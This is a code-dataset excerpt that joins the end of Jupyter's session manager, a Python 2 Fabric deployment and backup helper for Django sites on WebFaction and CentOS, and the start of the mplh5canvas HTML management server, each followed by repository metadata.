for column in kwargs.keys():
if column not in self._columns:
raise TypeError("No such column: %r" % column)
sets.append("%s=?" % column)
query = "UPDATE session SET %s WHERE session_id=?" % (', '.join(sets))
self.cursor.execute(query, list(kwargs.values()) + [session_id])
def kernel_culled(self, kernel_id):
"""Checks if the kernel is still considered alive and returns true if its not found. """
return kernel_id not in self.kernel_manager
@gen.coroutine
def row_to_model(self, row, tolerate_culled=False):
"""Takes sqlite database session row and turns it into a dictionary"""
kernel_culled = yield maybe_future(self.kernel_culled(row['kernel_id']))
if kernel_culled:
# The kernel was culled or died without deleting the session.
# We can't use delete_session here because that tries to find
# and shut down the kernel - so we'll delete the row directly.
#
# If caller wishes to tolerate culled kernels, log a warning
# and return None. Otherwise, raise KeyError with a similar
# message.
self.cursor.execute("DELETE FROM session WHERE session_id=?",
(row['session_id'],))
msg = "Kernel '{kernel_id}' appears to have been culled or died unexpectedly, " \
"invalidating session '{session_id}'. The session has been removed.".\
format(kernel_id=row['kernel_id'],session_id=row['session_id'])
if tolerate_culled:
self.log.warning(msg + " Continuing...")
raise gen.Return(None)
raise KeyError(msg)
kernel_model = yield maybe_future(self.kernel_manager.kernel_model(row['kernel_id']))
model = {
'id': row['session_id'],
'path': row['path'],
'name': row['name'],
'type': row['type'],
'kernel': kernel_model
}
if row['type'] == 'notebook':
# Provide the deprecated API.
model['notebook'] = {'path': row['path'], 'name': row['name']}
raise gen.Return(model)
@gen.coroutine
def list_sessions(self):
"""Returns a list of dictionaries containing all the information from
the session database"""
c = self.cursor.execute("SELECT * FROM session")
result = []
# We need to use fetchall() here, because row_to_model can delete rows,
# which messes up the cursor if we're iterating over rows.
for row in c.fetchall():
try:
model = yield maybe_future(self.row_to_model(row))
result.append(model)
except KeyError:
pass
raise gen.Return(result)
@gen.coroutine
def delete_session(self, session_id):
"""Deletes the row in the session database with given session_id"""
session = yield maybe_future(self.get_session(session_id=session_id))
yield maybe_future(self.kernel_manager.shutdown_kernel(session['kernel']['id']))
self.cursor.execute("DELETE FROM session WHERE session_id=?", (session_id,))
| {
"repo_name": "sserrot/champion_relationships",
"path": "venv/Lib/site-packages/notebook/services/sessions/sessionmanager.py",
"copies": "1",
"size": "10620",
"license": "mit",
"hash": -7185386996991418000,
"line_mean": 37.6181818182,
"line_max": 102,
"alpha_frac": 0.5959510358,
"autogenerated": false,
"ratio": 4.368572603866721,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.005891526665617668,
"num_lines": 275
} |
# A base file for use in fabfiles.
# This file is geared toward a particular directory structure on webfaction and in dev
# Some of it may be useful to other folks, but no guarantees.
# Local Structure
# /
# /db (sqllite for dev and dumps)
# /media
# /appname
# /source (psds and the like)
# Remote Structure (webfaction-based)
# ~/webapps/appname_live
# ~/webapps/appname_live/appname.git (live version)
# ~/webapps/appname_live/appname (symlinked -> # ~/webapps/appname_django/appname/appname)
# ~/webapps/appname_live/appname.wsgi
# ~/webapps/appname_static/ (symlinked* -> # ~/webapps/appname_django/appname/media/*)
# Usage
# Basic:
# from qi_toolkit.fabbase import *
# setup_env(project_name='projname',webfaction_user='username')
# Advanced
# from qi_toolkit.fabbase import *
# initial_settings = {
# 'media_dir':'static',
# }
# overrides = {
# 'workon': 'echo "no work today"',
# }
# setup_env(project_name='projname',webfaction_user='username', initial_settings=initial_settings, overrides=overrides)
from __future__ import with_statement # needed for python 2.5
from fabric.api import *
import fabric
from fabric.contrib.console import confirm
from qi_toolkit.helpers import print_exception
import time
def setup_env_webfaction(project_name, webfaction_user, initial_settings={}, overrides={}):
global env
env.dry_run = False
env.project_name = project_name
env.webfaction_user = webfaction_user
env.is_webfaction = True
env.is_centos = False
# Custom Config Start
env.python_version = "2.6"
env.parent = "origin"
env.working_branch = "master"
env.live_branch = "live"
env.python = "python"
env.is_local = False
env.local_working_path = "~/workingCopy"
env.media_dir = "media"
env.webfaction_host = '%(webfaction_user)s@%(webfaction_user)s.webfactional.com' % env
env.production_hosts = []
env.staging_hosts = []
env.production_db_hosts = []
env.update(initial_settings)
# semi-automated. Override this for more complex, multi-server setups, or non-wf installs.
env.production_hosts = ['%(webfaction_host)s' % env]
env.user_home = "/home/%(webfaction_user)s" % env
env.git_origin = "%(webfaction_host)s:%(user_home)s/git-root/%(project_name)s.git" % env
env.daily_backup_script_name = "daily_backup.sh"
env.weekly_backup_script_name = "weekly_backup.sh"
env.monthly_backup_script_name = "monthly_backup.sh"
env.staging_hosts = env.production_hosts
env.virtualenv_name = env.project_name
env.staging_virtualenv_name = "staging_%(project_name)s" % env
env.live_app_dir = "%(user_home)s/webapps/%(project_name)s_live" % env
env.live_static_dir = "%(user_home)s/webapps/%(project_name)s_static" % env
env.staging_app_dir = "%(user_home)s/webapps/%(project_name)s_staging" % env
env.staging_static_dir = "%(user_home)s/webapps/%(project_name)s_staging_static" % env
env.virtualenv_path = "%(user_home)s/.virtualenvs/%(virtualenv_name)s/lib/python%(python_version)s/site-packages/" % env
env.work_on = "workon %(virtualenv_name)s; " % env
env.backup_root = "%(user_home)s/backups" % env
env.offsite_backup_dir = "aglzen@quantumimagery.com:/home/aglzen/%(project_name)s/data/" % env
env.update(overrides)
def setup_env_centos(project_name, system_user="root", initial_settings={}, overrides={}):
global env
env.dry_run = False
env.project_name = project_name
env.system_user = system_user
env.is_webfaction = False
env.is_centos = True
# Custom Config Start
env.python_version = "2.6"
env.parent = "origin"
env.working_branch = "master"
env.live_branch = "live"
env.staging_branch = "staging"
env.python = "python"
env.is_local = False
env.local_working_path = "~/workingCopy"
env.media_dir = "media"
env.admin_symlink = "admin"
env.production_hosts = []
env.staging_hosts = []
env.production_db_hosts = []
env.staging_db_hosts = []
env.update(initial_settings)
env.production_hosts = ["%(system_user)s@%(h)s" % {'system_user':env.system_user,'h':h} for h in env.production_hosts]
env.staging_hosts = ["%(system_user)s@%(h)s" % {'system_user':env.system_user,'h':h} for h in env.staging_hosts]
env.production_db_hosts = ["%(system_user)s@%(h)s" % {'system_user':env.system_user,'h':h} for h in env.production_db_hosts]
env.staging_db_hosts = ["%(system_user)s@%(h)s" % {'system_user':env.system_user,'h':h} for h in env.staging_db_hosts]
if env.system_user == "root":
env.user_home = "/root"
else:
env.user_home = "/home/%(system_user)s" % env
env.virtualenv_name = env.project_name
env.staging_virtualenv_name = "staging_%(virtualenv_name)s" % env
env.live_app_dir = "/var/www"
env.git_path = "%(live_app_dir)s/%(project_name)s.git" % env
env.live_static_dir = "%(git_path)s/media" % env
env.staging_app_dir = env.live_app_dir
env.staging_static_dir = env.live_static_dir
env.virtualenv_path = "%(user_home)s/.virtualenvs/%(virtualenv_name)s/lib/python%(python_version)s/site-packages/" % env
env.work_on = "workon %(virtualenv_name)s; " % env
env.backup_root = "%(user_home)s/backups" % env
env.offsite_backup_dir = "aglzen@quantumimagery.com:/home/aglzen/%(project_name)s/data/" % env
env.update(overrides)
def setup_backup_env_webfaction():
env.current_backup_file = "%(backup_dir)s/currentBackup.json" % env
env.daily_backup_script = daily_backup_script()
env.weekly_backup_script = weekly_backup_script()
env.monthly_backup_script = monthly_backup_script()
def live(dry_run="False"):
if not confirm("You do mean live, right?"):
abort("Bailing out!")
else:
env.dry_run = dry_run.lower() == "true"
env.python = "python%(python_version)s" % env
env.role = "live"
env.settings_file = "envs.%(role)s" % env
env.hosts = env.production_hosts
env.base_path = env.live_app_dir
env.git_path = "%(live_app_dir)s/%(project_name)s.git" % env
env.backup_dir = "%(user_home)s/backups/%(project_name)s" % env
env.media_path = env.live_static_dir
env.pull_branch = env.live_branch
env.release_tag = "%(role)s_release" % env
setup_backup_env_webfaction()
def staging(dry_run="False"):
env.dry_run = dry_run.lower() == "true"
env.python = "python%(python_version)s" % env
env.role = "staging"
env.settings_file = "envs.%(role)s" % env
env.hosts = env.staging_hosts
env.base_path = env.staging_app_dir
env.git_path = "%(staging_app_dir)s/%(project_name)s.git" % env
env.media_path = env.staging_static_dir
env.backup_dir = "%(user_home)s/backups/staging_%(project_name)s" % env
env.pull_branch = env.live_branch
env.release_tag = "%(role)s_release" % env
env.virtualenv_name = env.staging_virtualenv_name
env.virtualenv_path = "%(user_home)s/.virtualenvs/%(virtualenv_name)s/lib/python%(python_version)s/site-packages/" % env
env.work_on = "workon %(virtualenv_name)s; " % env
setup_backup_env_webfaction()
def localhost(dry_run="False"):
env.dry_run = dry_run.lower() == "true"
env.hosts = ['localhost']
env.role = "localhost"
env.settings_file = "envs.dev" % env
env.is_webfaction = False
env.is_centos = False
env.base_path = "%(local_working_path)s/%(project_name)s" % env
env.git_path = env.base_path
env.backup_dir = "%(local_working_path)s/db" % env
env.pull_branch = env.working_branch
env.release_tag = "%(role)s_release" % env
env.virtualenv_path = "~/.virtualenvs/%(virtualenv_name)s/lib/python%(python_version)s/site-packages/" % env
env.is_local = True
env.media_path = "%(base_path)s/%(media_dir)s" % env
setup_backup_env_webfaction()
def live_db():
env.hosts = env.production_db_hosts
def staging_db():
env.hosts = env.staging_db_hosts
def live_celery():
env.hosts = env.production_celery_hosts
def staging_celery():
env.hosts = env.staging_celery_hosts
def has_separate_celery_server():
return hasattr(env,"%s_celery_hosts" % env.role)
env.roledefs = {
'live': [live],
'staging': [staging],
'local':[local],
'live_db':[live_db],
'staging_db':[staging_db],
'live_celery':[live_celery],
'staging_celery':[staging_celery],
}
def safe(function_call, *args, **kwargs):
try:
ret = function_call(*args, **kwargs)
return ret
except:
pass
def safe_magic_run(function_call, *args, **kwargs):
with settings(warn_only=True):
return magic_run(function_call, *args, **kwargs)
# Custom Config End
def magic_run(function_call, custom_env=None):
global env
prev_env = env
if custom_env:
env = custom_env
if env.dry_run:
print function_call % c_env
else:
if env.is_local:
ret = local(function_call % env)
else:
ret = run(function_call % env)
env = prev_env
return ret
def setup_server():
if env.is_webfaction:
try:
safe_magic_run("mkdir %(user_home)s/src")
magic_run("echo \"alias l='ls -agl'\nalias python=python%(python_version)s\nexport WORKON_HOME=$HOME/.virtualenvs\nsource ~/bin/virtualenvwrapper.sh\" >> %(user_home)s/.bashrc")
except:
pass
try:
magic_run("git --version")
except:
env.git_file_version = "1.7.3.3"
magic_run("cd src;wget http://kernel.org/pub/software/scm/git/git-%(git_file_version)s.tar.bz2")
magic_run("cd %(user_home)s/src/; tar fxj git-%(git_file_version)s.tar.bz2;")
magic_run("cd %(user_home)s/src/git-%(git_file_version)s; ./configure --prefix=%(user_home)s/git/; make; make install;")
magic_run("echo \"export PATH=$PATH:/%(user_home)s/git/bin/\" >> %(user_home)s/.bashrc")
try:
magic_run("pip --version")
except:
try:
safe_magic_run("mkdir %(user_home)s/lib:")
except:
pass
try:
safe_magic_run("mkdir %(user_home)s/lib/python%(python_version)s")
except:
pass
magic_run("easy_install-%(python_version)s pip")
magic_run("pip install --upgrade pip virtualenv virtualenvwrapper")
safe_magic_run("mkdir %(user_home)s/.virtualenvs")
magic_run("mkvirtualenv --no-site-packages %(virtualenv_name)s;")
magic_run("echo 'cd %(git_path)s/' > %(user_home)s/.virtualenvs/%(virtualenv_name)s/bin/postactivate")
magic_run("echo 'export DJANGO_SETTINGS_MODULE=\"envs.%(role)s\"' >> %(user_home)s/.virtualenvs/%(virtualenv_name)s/bin/postactivate")
magic_run("echo 'export PYTHONPATH=\"%(user_home)s/.virtualenvs/%(virtualenv_name)s/lib/site-packages/:%(base_path)s/%(project_name)s\"' >> %(user_home)s/.virtualenvs/%(virtualenv_name)s/bin/postactivate")
safe_magic_run("mkdir %(base_path)s")
magic_run("git clone %(git_origin)s %(git_path)s")
magic_run("%(work_on)s git checkout %(pull_branch)s; git pull")
setup_media_symlinks()
setup_project_symlinks()
install_requirements()
setup_backup_dir_and_cron()
if not env.is_local:
safe_magic_run("rm -rf %(base_path)s/myproject; rm %(base_path)s/myproject.wsgi")
# httpd.conf
magic_run("mv %(base_path)s/apache2/conf/httpd.conf %(base_path)s/apache2/conf/httpd.conf.bak")
magic_run("sed 'N;$!P;$!D;$d' %(base_path)s/apache2/conf/httpd.conf.bak > %(base_path)s/apache2/conf/httpd.conf")
magic_run("echo 'WSGIPythonPath %(base_path)s:%(base_path)s/lib/python%(python_version)s:%(virtualenv_path)s' >> %(base_path)s/apache2/conf/httpd.conf")
magic_run("echo 'WSGIScriptAlias / %(base_path)s/%(project_name)s.wsgi' >> %(base_path)s/apache2/conf/httpd.conf")
# WSGI file
magic_run("touch %(base_path)s/%(project_name)s.wsgi")
magic_run("echo 'import os, sys' > %(base_path)s/%(project_name)s.wsgi")
magic_run("echo 'from django.core.handlers.wsgi import WSGIHandler' >> %(base_path)s/%(project_name)s.wsgi")
magic_run("echo \"sys.path = ['%(virtualenv_path)s','%(git_path)s/%(project_name)s','/usr/local/lib/python%(python_version)s/site-packages/', '%(git_path)s', '%(virtualenv_path)s../../../src/django-cms'] + sys.path\" >> %(base_path)s/%(project_name)s.wsgi")
magic_run("echo \"os.environ['DJANGO_SETTINGS_MODULE'] = '%(project_name)s.envs.%(role)s'\" >> %(base_path)s/%(project_name)s.wsgi")
magic_run("echo 'application = WSGIHandler()' >> %(base_path)s/%(project_name)s.wsgi")
restart()
def make_wsgi_file():
magic_run("touch %(base_path)s/%(project_name)s.wsgi")
magic_run("echo 'import os, sys' > %(base_path)s/%(project_name)s.wsgi")
magic_run("echo 'from django.core.handlers.wsgi import WSGIHandler' >> %(base_path)s/%(project_name)s.wsgi")
magic_run("echo \"sys.path = ['%(virtualenv_path)s','%(git_path)s/%(project_name)s','/usr/local/lib/python%(python_version)s/site-packages/', '%(git_path)s', '%(virtualenv_path)s../../../src/django-cms'] + sys.path\" >> %(base_path)s/%(project_name)s.wsgi")
magic_run("echo \"os.environ['DJANGO_SETTINGS_MODULE'] = '%(project_name)s.settings'\" >> %(base_path)s/%(project_name)s.wsgi")
magic_run("echo 'application = WSGIHandler()' >> %(base_path)s/%(project_name)s.wsgi")
def setup_media_symlinks():
safe_magic_run("cd %(media_path)s; ln -s %(git_path)s/%(media_dir)s/* .")
def setup_django_admin_media_symlinks():
magic_run("cd %(media_path)s; rm -rf %(admin_symlink)s; ln -s %(virtualenv_path)sdjango/contrib/admin/media %(admin_symlink)s")
def setup_cms_symlinks():
magic_run("cd %(media_path)s; touch cms; rm cms; ln -s %(virtualenv_path)scms/media/cms .")
def setup_project_symlinks():
pass
def pull(custom_env=None):
if env.is_webfaction:
"Updates the repository."
magic_run("cd %(git_path)s; git checkout %(pull_branch)s;git pull", custom_env)
else:
magic_run("cd %(git_path)s; git checkout %(pull_branch)s; git fetch --tags; git pull; git checkout %(release_tag)s", custom_env)
def git_reset(hash=""):
env.hash = hash
"Resets the repository to specified version."
magic_run("%(work_on); git reset --hard %(hash)s")
def ls():
"Resets the repository to specified version."
magic_run("cd %(base_path)s; ls")
def restart():
return reboot()
def tag_commit_for_release():
local("git tag -d %(release_tag)s; git tag %(release_tag)s; git push --tags" % env)
def reboot():
"Reboot the wsgi server."
if env.is_webfaction:
shut_down = False
while not shut_down:
output = magic_run("%(base_path)s/apache2/bin/stop;")
shut_down = (output.find("Apache is not running") != -1)
if not shut_down:
time.sleep(1)
magic_run("%(base_path)s/apache2/bin/start;")
elif env.is_centos:
magic_run("service %(project_name)s restart")
def stop():
"Stop the wsgi server."
if not env.is_local:
if env.is_webfaction:
magic_run("%(base_path)s/apache2/bin/stop;")
elif env.is_centos:
try:
magic_run("service %(project_name)s stop")
except:
# Don't fail if it's already stopped.
pass
def start():
"Start the wsgi server."
if env.is_webfaction:
magic_run("%(base_path)s/apache2/bin/start;")
elif env.is_centos:
magic_run("service %(project_name)s start")
def nginx_reboot():
if env.is_centos:
magic_run("service nginx restart")
def nginx_stop():
if env.is_centos:
magic_run("service nginx stop")
def nginx_start():
if env.is_centos:
magic_run("service nginx start")
def celery_env():
c_env = env
if has_separate_celery_server():
c_env.hosts = getattr(env,"%s_celery_hosts" % env.role)
return c_env
def celery_pull():
if env.is_centos:
pull(celery_env())
def celery_restart():
if env.is_centos:
magic_run("service celeryd-%(project_name)s restart", celery_env())
def celery_stop():
if env.is_centos:
magic_run("service celeryd-%(project_name)s stop", celery_env())
def celery_start():
if env.is_centos:
magic_run("service celeryd-%(project_name)s start", celery_env())
def install_requirements(force_pip_upgrade=False, use_unstable=True, clear_source=True):
"Install the requirements."
env.force_upgrade_string = ""
if force_pip_upgrade:
env.force_upgrade_string = "--upgrade"
env.requirements = "requirements.stable.txt"
if use_unstable:
env.requirements = "requirements.txt"
if clear_source:
magic_run("rm -rf %(virtualenv_path)s../../../src")
magic_run("%(work_on)s pip install %(force_upgrade_string)s -q -r %(requirements)s" % env)
def quick_install_requirements(force_pip_upgrade=False, use_unstable=False, clear_source=False):
"Install the requirements, but don't upgrade everything."
install_requirements(force_pip_upgrade=force_pip_upgrade, use_unstable=use_unstable, clear_source=clear_source)
def safe_install_requirements(force_pip_upgrade=False, use_unstable=False, clear_source=True):
"Install the requirements, and upgrade everything."
install_requirements(force_pip_upgrade=force_pip_upgrade, use_unstable=use_unstable, clear_source=clear_source)
@runs_once
def backup_for_deploy():
"Backup before deploys."
import os.path
if env.is_webfaction:
env.current_backup_file = "%(backup_dir)s/currentDeployBackup.json" % env
if not os.path.isfile(env.current_backup_file):
magic_run("%(work_on)s cd %(project_name)s; %(python)s manage.py dumpdata --indent 4 > %(current_backup_file)s")
magic_run("zip -r9q %(backup_dir)s/pre_deploy_`date +%%F`.zip %(current_backup_file)s; rm %(current_backup_file)s")
if env.is_local:
magic_run("cp %(current_backup_file)s %(git_path)s/db/all_data.json")
else:
abort("Deploy backup failed - previous deploy did not finish cleanly.")
elif env.is_centos:
env.current_backup_file = "%(backup_dir)s/currentDeployBackup.dump" % env
if not os.path.isfile(env.current_backup_file):
magic_run("%(work_on)s cd %(project_name)s; %(python)s manage.py dumpdb > %(current_backup_file)s")
magic_run("bzip2 -9q %(current_backup_file)s; mv %(current_backup_file)s.bz2 %(backup_dir)s/pre_deploy_`date +%%F`.bz2 ;cp %(backup_dir)s/pre_deploy_`date +%%F`.bz2 %(backup_dir)s/latest_deploy.dump.bz2")
if env.is_local:
magic_run("cp %(current_backup_file)s %(git_path)s/db/all_data.json")
else:
abort("Deploy backup failed - previous deploy did not finish cleanly.")
@runs_once
def download_data_dump():
backup_for_deploy()
get("%(backup_dir)s/latest_deploy.dump.bz2" % env, env.local_working_path)
local("bunzip2 %(local_working_path)s/latest_deploy.dump.bz2" % env)
@runs_once
def load_data_dump_locally(local_file=None):
env.local_file = local_file
if not env.local_file:
env.local_file = "%(local_working_path)s/latest_deploy.dump" % env
local("%(work_on)s cd %(project_name)s; %(python)s manage.py restoredb < %(local_file)s" % env)
local("rm %(local_file)s" % env)
@runs_once
def put_and_load_data_dump(local_file=None):
if env.role != "live" or confirm("Wait, really? Really really??"):
env.local_file = local_file
if not env.local_file:
env.local_file = "%(local_working_path)s/latest_deploy.dump" % env
env.remote_file = "%(base_path)s/latest_deploy.dump" % env
put(env.local_file, env.remote_file)
magic_run("%(work_on)s cd %(project_name)s; %(python)s manage.py restoredb < %(remote_file)s")
magic_run("rm %(remote_file)s")
@runs_once
def get_and_load_datadump():
download_data_dump()
load_data_dump_locally()
@runs_once
def freeze_current_versions():
local("pip freeze -r requirements.txt > requirements.stable.txt")
def setup_backup_dir_and_cron():
# requires fabric and python-crontab installed on the target
safe_magic_run("mkdir %(backup_root)s")
safe_magic_run("mkdir %(backup_dir)s")
try:
magic_run("echo '%(daily_backup_script)s' > %(backup_dir)s/%(daily_backup_script_name)s")
magic_run("echo '%(weekly_backup_script)s' > %(backup_dir)s/%(weekly_backup_script_name)s")
magic_run("echo '%(monthly_backup_script)s' > %(backup_dir)s/%(monthly_backup_script_name)s")
magic_run("chmod +x %(backup_dir)s/%(daily_backup_script_name)s")
magic_run("chmod +x %(backup_dir)s/%(weekly_backup_script_name)s")
magic_run("chmod +x %(backup_dir)s/%(monthly_backup_script_name)s")
magic_run("%(work_on)s fab %(role)s setup_crontab")
except:
print "CRONTAB SETUP FAILED. Set up the crontabs manually."
def setup_crontab():
try:
from crontab import CronTab
tab = CronTab()
daily_command = "%(backup_dir)s/%(daily_backup_script_name)s > /dev/null 2>&1" % env
weekly_command = "%(backup_dir)s/%(weekly_backup_script_name)s > /dev/null 2>&1" % env
monthly_command = "%(backup_dir)s/%(monthly_backup_script_name)s > /dev/null 2>&1" % env
changed = False
if len(tab.find_command(daily_command)) == 0:
daily_tab = tab.new(command=daily_command)
daily_tab.hour().on(1)
daily_tab.minute().on(0)
changed = True
if len(tab.find_command(weekly_command)) == 0:
weekly_tab = tab.new(command=weekly_command)
weekly_tab.dow().on(1)
weekly_tab.hour().on(2)
weekly_tab.minute().on(0)
changed = True
if len(tab.find_command(monthly_command)) == 0:
monthly_tab = tab.new(command=monthly_command)
monthly_tab.dom().on(1)
monthly_tab.hour().on(3)
monthly_tab.minute().on(0)
changed = True
if changed:
tab.write()
except:
print_exception()
pass
@runs_once
def backup_daily():
if not fabric.contrib.files.exists(env.current_backup_file):
magic_run("%(backup_dir)s/%(daily_backup_script_name)s")
else:
abort("Backup FAILED. Previous backup did not complete. Please manually fix the server.")
def daily_backup_script():
script = """#!/bin/bash
source %(user_home)s/bin/virtualenvwrapper.sh
%(work_on)s cd %(project_name)s;
%(python)s manage.py dumpdata --indent 4 > %(current_backup_file)s
mv %(backup_dir)s/days-ago-6.zip %(backup_dir)s/days-ago-7.zip
mv %(backup_dir)s/days-ago-5.zip %(backup_dir)s/days-ago-6.zip
mv %(backup_dir)s/days-ago-4.zip %(backup_dir)s/days-ago-5.zip
mv %(backup_dir)s/days-ago-3.zip %(backup_dir)s/days-ago-4.zip
mv %(backup_dir)s/days-ago-2.zip %(backup_dir)s/days-ago-3.zip
mv %(backup_dir)s/days-ago-1.zip %(backup_dir)s/days-ago-2.zip
mv %(backup_dir)s/days-ago-0.zip %(backup_dir)s/days-ago-1.zip
zip -r9q %(backup_dir)s/days-ago-0.zip %(current_backup_file)s
rm %(current_backup_file)s
cd %(backup_dir)s; mkdir cur_images;
cp -R %(media_path)s/cms %(backup_dir)s/cur_images/
cp -R %(media_path)s/images %(backup_dir)s/cur_images/
cd %(backup_dir)s; zip -r9q cur_images2.zip cur_images
cd %(backup_dir)s; rm -rf cur_images
mv %(backup_dir)s/cur_images2.zip %(backup_dir)s/cur_images.zip
scp %(backup_dir)s/cur_images.zip %(offsite_backup_dir)s
""" % env
# script = script.replace("\n","\\n")
return script
def backup_weekly():
magic_run("%(backup_dir)s/%(weekly_backup_script_name)s")
def weekly_backup_script():
script = """#!/bin/bash
mv %(backup_dir)s/weeks-ago-4.zip %(backup_dir)s/weeks-ago-5.zip
mv %(backup_dir)s/weeks-ago-3.zip %(backup_dir)s/weeks-ago-4.zip
mv %(backup_dir)s/weeks-ago-2.zip %(backup_dir)s/weeks-ago-3.zip
mv %(backup_dir)s/weeks-ago-1.zip %(backup_dir)s/weeks-ago-2.zip
mv %(backup_dir)s/weeks-ago-0.zip %(backup_dir)s/weeks-ago-1.zip
cp %(backup_dir)s/days-ago-0.zip %(backup_dir)s/weeks-ago-0.zip
cd %(backup_dir)s; scp * %(offsite_backup_dir)s
""" % env
# script = script.replace("\n","\\n")
return script
@runs_once
def backup_monthly():
magic_run("%(backup_dir)s/%(monthly_backup_script_name)s")
def monthly_backup_script():
script = """#!/bin/bash
cp %(backup_dir)s/weeks-ago-0.zip %(backup_dir)s/month-`date +%%F`.zip
""" % env
# script = script.replace("\n","\\n")
return script
def kill_pyc():
magic_run("%(work_on)s cd %(git_path)s;find . -iname '*.pyc' -delete")
@runs_once
def migrate():
magic_run("%(work_on)s cd %(project_name)s; %(python)s manage.py migrate --database=default")
@runs_once
def syncdb():
magic_run("%(work_on)s cd %(project_name)s; %(python)s manage.py syncdb --noinput --database=default")
@runs_once
def deploy_media():
try:
local("%(work_on)s cd %(project_name)s; git checkout %(release_tag)s; %(python)s manage.py syncmedia --settings=%(settings_file)s;git checkout %(pull_branch)s" % env)
except:
print_exception()
def deploy_fast(with_media="True", force_pip_upgrade="False", use_unstable="False"):
force_pip_upgrade = force_pip_upgrade.lower() == "true"
with_media = with_media.lower() == "true"
use_unstable = use_unstable.lower() == "true"
# backup_for_deploy()
if with_media:
deploy_media()
pull()
kill_pyc()
quick_install_requirements(force_pip_upgrade=force_pip_upgrade, use_unstable=use_unstable)
syncdb()
migrate()
if has_separate_celery_server():
celery_pull()
celery_restart()
reboot()
def deploy_slow(with_media="True", force_pip_upgrade="False", use_unstable="False"):
force_pip_upgrade = force_pip_upgrade.lower() == "true"
with_media = with_media.lower() == "true"
use_unstable = use_unstable.lower() == "true"
if with_media:
deploy_media()
stop()
# backup_for_deploy()
pull()
kill_pyc()
safe_install_requirements(force_pip_upgrade=force_pip_upgrade, use_unstable=use_unstable)
syncdb()
migrate()
if has_separate_celery_server():
celery_pull()
celery_restart()
nginx_reboot()
start()
def reset(repo, hash):
"""
Reset all git repositories to specified hash.
Usage:
fab reset:repo=my_repo,hash=etcetc123
"""
require("fab_hosts", provided_by=[production])
env.hash = hash
env.repo = repo
invoke(git_reset)
def ssh_auth_me():
try:
my_key = local("cat ~/.ssh/id_dsa.pub")
except:
my_key = ""
if my_key == "":
my_key = local("cat ~/.ssh/id_rsa.pub")
sudo("mkdir ~/.ssh; chmod 700 ~/.ssh; touch ~/.ssh/authorized_keys; chmod 600 ~/.ssh/authorized_keys;")
sudo("echo '%s' >> ~/.ssh/authorized_keys" % (my_key))
| {
"repo_name": "skoczen/qi-toolkit",
"path": "qi_toolkit/boltbase.py",
"copies": "1",
"size": "27252",
"license": "bsd-3-clause",
"hash": 542443995684853060,
"line_mean": 37.6553191489,
"line_max": 269,
"alpha_frac": 0.6307426978,
"autogenerated": false,
"ratio": 3.1006940493799067,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9180860283737722,
"avg_score": 0.010115292688437076,
"num_lines": 705
} |
"""A base for handling management of the h5 canvas backend.
Its jobs are as follows:
- Provide a standardised base port for clients to connect to
- Serve up the html wrapper page
- Provide a list of currently available plots (perhaps with a thumbnail)
- Manage the list of plots as time goes by
Simon Ratcliffe (sratcliffe@ska.ac.za)
Ludwig Schwardt (ludwig@ska.ac.za)
Copyright (c) 2010-2013, SKA South Africa
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
Neither the name of SKA South Africa nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import BaseHTTPServer
import simple_server
import base_page
import thread
import sys
import re
import socket
import time
import logging
logger = logging.getLogger("mplh5canvas.management_server")
try:
import netifaces
except:
netifaces = None
class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
base_html = base_page.base_html
base_html_decoration = base_page.base_html_decoration
base_html_canvii = base_page.base_html_canvii
thumb_html = base_page.thumb_html
thumb_inner = base_page.thumb_inner
h5m = None
server_port = ""
custom_content = None
def do_GET(self):
server_ip = self.connection.getsockname()[0]
logger.info("Server ip for connection: %s " % server_ip)
match = re.compile("\/(\d*)$").match(self.path)
ports = self.h5m._figures.keys()
ports.sort()
self.wfile.write(self.protocol_version + ' 200 OK\n\n')
if match is not None:
req_layout = match.groups()[0]
for port in ports:
canvas = self.h5m._figures[port]
req_layout = (req_layout == '' and "" or "set_layout(" + str(req_layout) + ");")
bh = self.base_html + self.base_html_decoration + self.base_html_canvii
self.wfile.write(bh.replace('<!--requested_layout-->',req_layout).replace('<!--server_ip-->',server_ip).replace('<!--server_port-->',self.server_port).replace('<!--canvas_top-->','105').replace('<!--canvas_left-->','10').replace('<!--canvas_position-->','absolute'))
elif self.path.startswith("/figure"):
try:
fig_no = int(self.path[7:]) - 1
except ValueError:
fig_no = 0
if fig_no < 0: fig_no = 0
# get the first figure by default
try:
port = ports[fig_no]
custom_content = self.h5m._figures[port]._custom_content
bh = self.base_html + self.base_html_canvii
req_layout = "plot_if_possible(" + str(port) + ");"
content = bh.replace('<!--requested_layout-->',req_layout).replace('<!--server_ip-->',server_ip).replace('<!--server_port-->',self.server_port).replace('<!--canvas_top-->','10').replace('<!--canvas_left-->','10').replace('<!--canvas_position-->','absolute')
if custom_content is not None:
content = custom_content.replace("<!--figure-->", content)
self.wfile.write(content)
except IndexError:
self.wfile.write("Invalid Figure number (" + str(fig_no+1) + ") specified.")
elif self.path == "/thumbs":
# for each figure, create a thumbnail snippet and slipstream the js for the preview
figure_count = 0
thumbs = ""
for port in ports:
canvas = self.h5m._figures[port]
